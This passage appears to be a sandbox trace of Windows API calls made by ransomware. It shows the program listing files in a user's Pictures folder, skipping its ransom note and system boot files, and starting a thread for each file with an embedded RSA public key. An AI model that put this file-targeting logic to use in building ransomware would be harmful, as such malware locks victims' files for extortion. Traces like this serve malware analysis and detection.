returned 0x0 [0250.729] StrStrW (lpFirst="C30CF4F82E58715357484B18328D559B.XZZX", lpSrch="ntdetect.com") returned 0x0 [0250.729] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0250.729] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0250.729] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0250.729] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0250.729] lstrcpyW (in: lpString1=0x17cf1c, lpString2="C30CF4F82E58715357484B18328D559B.XZZX" | out: lpString1="C30CF4F82E58715357484B18328D559B.XZZX") returned="C30CF4F82E58715357484B18328D559B.XZZX" [0250.729] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0250.729] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x13a8 [0250.729] Sleep (dwMilliseconds=0x96) [0250.884] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0250.885] lstrcmpW (lpString1="C355F5402BEDF72E504955A0300EDB76.XZZX", lpString2="..") returned 1 [0250.885] lstrcmpW (lpString1="C355F5402BEDF72E504955A0300EDB76.XZZX", lpString2=".") returned 1 [0250.885] StrStrW (lpFirst="C355F5402BEDF72E504955A0300EDB76.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0250.885] StrStrW (lpFirst="C355F5402BEDF72E504955A0300EDB76.XZZX", lpSrch="ntldr") returned 0x0 [0250.885] StrStrW (lpFirst="C355F5402BEDF72E504955A0300EDB76.XZZX", lpSrch="NTLDR") returned 0x0 [0250.885] StrStrW (lpFirst="C355F5402BEDF72E504955A0300EDB76.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0250.885] StrStrW (lpFirst="C355F5402BEDF72E504955A0300EDB76.XZZX", lpSrch="ntdetect.com") returned 0x0 [0250.885] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0250.885] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0250.885] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0250.885] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0250.885] lstrcpyW (in: lpString1=0x17cf1c, lpString2="C355F5402BEDF72E504955A0300EDB76.XZZX" | out: lpString1="C355F5402BEDF72E504955A0300EDB76.XZZX") returned="C355F5402BEDF72E504955A0300EDB76.XZZX" [0250.885] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0250.885] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x13ac [0250.885] WaitForSingleObject (hHandle=0x13ac, dwMilliseconds=0xffffffff) returned 0x0 [0250.887] Sleep (dwMilliseconds=0x96) [0251.040] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0251.040] lstrcmpW (lpString1="C87868381959CC9C63DBF2EC1D8EB0E4.XZZX", lpString2="..") returned 1 [0251.040] lstrcmpW (lpString1="C87868381959CC9C63DBF2EC1D8EB0E4.XZZX", lpString2=".") returned 1 [0251.041] StrStrW (lpFirst="C87868381959CC9C63DBF2EC1D8EB0E4.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0251.041] StrStrW (lpFirst="C87868381959CC9C63DBF2EC1D8EB0E4.XZZX", lpSrch="ntldr") returned 0x0 [0251.041] StrStrW (lpFirst="C87868381959CC9C63DBF2EC1D8EB0E4.XZZX", lpSrch="NTLDR") returned 0x0 [0251.041] StrStrW (lpFirst="C87868381959CC9C63DBF2EC1D8EB0E4.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0251.041] StrStrW (lpFirst="C87868381959CC9C63DBF2EC1D8EB0E4.XZZX", lpSrch="ntdetect.com") returned 0x0 [0251.041] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0251.041] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0251.041] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0251.041] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0251.041] lstrcpyW (in: lpString1=0x17cf1c, lpString2="C87868381959CC9C63DBF2EC1D8EB0E4.XZZX" | out: lpString1="C87868381959CC9C63DBF2EC1D8EB0E4.XZZX") returned="C87868381959CC9C63DBF2EC1D8EB0E4.XZZX" [0251.041] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0251.041] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x13b0 [0251.041] Sleep (dwMilliseconds=0x96) [0251.197] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0251.197] lstrcmpW (lpString1="D2FBB85013E759FE97CF4AF0181D3E46.XZZX", lpString2="..") returned 1 [0251.197] lstrcmpW (lpString1="D2FBB85013E759FE97CF4AF0181D3E46.XZZX", lpString2=".") returned 1 [0251.197] StrStrW (lpFirst="D2FBB85013E759FE97CF4AF0181D3E46.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0251.197] StrStrW (lpFirst="D2FBB85013E759FE97CF4AF0181D3E46.XZZX", lpSrch="ntldr") returned 0x0 [0251.197] StrStrW (lpFirst="D2FBB85013E759FE97CF4AF0181D3E46.XZZX", lpSrch="NTLDR") returned 0x0 [0251.197] StrStrW (lpFirst="D2FBB85013E759FE97CF4AF0181D3E46.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0251.197] StrStrW (lpFirst="D2FBB85013E759FE97CF4AF0181D3E46.XZZX", lpSrch="ntdetect.com") returned 0x0 [0251.197] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0251.197] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0251.197] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0251.197] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0251.197] lstrcpyW (in: lpString1=0x17cf1c, lpString2="D2FBB85013E759FE97CF4AF0181D3E46.XZZX" | out: lpString1="D2FBB85013E759FE97CF4AF0181D3E46.XZZX") returned="D2FBB85013E759FE97CF4AF0181D3E46.XZZX" [0251.197] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0251.197] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x13b4 [0251.198] Sleep (dwMilliseconds=0x96) [0251.352] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0251.352] lstrcmpW (lpString1="D3D882303025B5406F9968D234469988.XZZX", lpString2="..") returned 1 [0251.352] lstrcmpW (lpString1="D3D882303025B5406F9968D234469988.XZZX", lpString2=".") returned 1 [0251.352] StrStrW (lpFirst="D3D882303025B5406F9968D234469988.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0251.352] StrStrW (lpFirst="D3D882303025B5406F9968D234469988.XZZX", lpSrch="ntldr") returned 0x0 [0251.353] StrStrW (lpFirst="D3D882303025B5406F9968D234469988.XZZX", lpSrch="NTLDR") returned 0x0 [0251.353] StrStrW (lpFirst="D3D882303025B5406F9968D234469988.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0251.353] StrStrW (lpFirst="D3D882303025B5406F9968D234469988.XZZX", lpSrch="ntdetect.com") returned 0x0 [0251.353] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0251.353] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0251.353] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0251.353] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0251.353] lstrcpyW (in: lpString1=0x17cf1c, lpString2="D3D882303025B5406F9968D234469988.XZZX" | out: lpString1="D3D882303025B5406F9968D234469988.XZZX") returned="D3D882303025B5406F9968D234469988.XZZX" [0251.353] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0251.353] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x13b8 [0251.353] Sleep (dwMilliseconds=0x96) [0251.508] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0251.508] lstrcmpW (lpString1="D59AAFC73FFFF3FE126A516D4420D846.XZZX", lpString2="..") returned 1 [0251.508] lstrcmpW (lpString1="D59AAFC73FFFF3FE126A516D4420D846.XZZX", lpString2=".") returned 1 [0251.508] StrStrW (lpFirst="D59AAFC73FFFF3FE126A516D4420D846.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0251.509] StrStrW (lpFirst="D59AAFC73FFFF3FE126A516D4420D846.XZZX", lpSrch="ntldr") returned 0x0 [0251.509] StrStrW (lpFirst="D59AAFC73FFFF3FE126A516D4420D846.XZZX", lpSrch="NTLDR") returned 0x0 [0251.509] StrStrW (lpFirst="D59AAFC73FFFF3FE126A516D4420D846.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0251.509] StrStrW (lpFirst="D59AAFC73FFFF3FE126A516D4420D846.XZZX", lpSrch="ntdetect.com") returned 0x0 [0251.509] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0251.509] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0251.509] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0251.509] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0251.509] lstrcpyW (in: lpString1=0x17cf1c, lpString2="D59AAFC73FFFF3FE126A516D4420D846.XZZX" | out: lpString1="D59AAFC73FFFF3FE126A516D4420D846.XZZX") returned="D59AAFC73FFFF3FE126A516D4420D846.XZZX" [0251.509] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0251.509] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x13bc [0251.509] Sleep (dwMilliseconds=0x96) [0251.664] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0251.664] lstrcmpW (lpString1="D5D72CD040472A6053677EF544680EA8.XZZX", lpString2="..") returned 1 [0251.664] lstrcmpW (lpString1="D5D72CD040472A6053677EF544680EA8.XZZX", lpString2=".") returned 1 [0251.664] StrStrW (lpFirst="D5D72CD040472A6053677EF544680EA8.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0251.664] StrStrW (lpFirst="D5D72CD040472A6053677EF544680EA8.XZZX", lpSrch="ntldr") returned 0x0 [0251.665] StrStrW (lpFirst="D5D72CD040472A6053677EF544680EA8.XZZX", lpSrch="NTLDR") returned 0x0 [0251.665] StrStrW (lpFirst="D5D72CD040472A6053677EF544680EA8.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0251.665] StrStrW (lpFirst="D5D72CD040472A6053677EF544680EA8.XZZX", lpSrch="ntdetect.com") returned 0x0 [0251.665] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0251.665] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0251.665] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0251.665] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0251.665] lstrcpyW (in: lpString1=0x17cf1c, lpString2="D5D72CD040472A6053677EF544680EA8.XZZX" | out: lpString1="D5D72CD040472A6053677EF544680EA8.XZZX") returned="D5D72CD040472A6053677EF544680EA8.XZZX" [0251.665] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0251.665] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x13c0 [0251.665] Sleep (dwMilliseconds=0x96) [0251.820] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0251.821] lstrcmpW (lpString1="F28BD0F0084D975830F3B58E0C6E7BA0.XZZX", lpString2="..") returned 1 [0251.821] lstrcmpW (lpString1="F28BD0F0084D975830F3B58E0C6E7BA0.XZZX", lpString2=".") returned 1 [0251.821] StrStrW (lpFirst="F28BD0F0084D975830F3B58E0C6E7BA0.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0251.821] StrStrW (lpFirst="F28BD0F0084D975830F3B58E0C6E7BA0.XZZX", lpSrch="ntldr") returned 0x0 [0251.821] StrStrW (lpFirst="F28BD0F0084D975830F3B58E0C6E7BA0.XZZX", lpSrch="NTLDR") returned 0x0 [0251.821] StrStrW (lpFirst="F28BD0F0084D975830F3B58E0C6E7BA0.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0251.821] StrStrW (lpFirst="F28BD0F0084D975830F3B58E0C6E7BA0.XZZX", lpSrch="ntdetect.com") returned 0x0 [0251.821] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0251.821] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0251.821] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0251.821] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0251.821] lstrcpyW (in: lpString1=0x17cf1c, lpString2="F28BD0F0084D975830F3B58E0C6E7BA0.XZZX" | out: lpString1="F28BD0F0084D975830F3B58E0C6E7BA0.XZZX") returned="F28BD0F0084D975830F3B58E0C6E7BA0.XZZX" [0251.821] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: 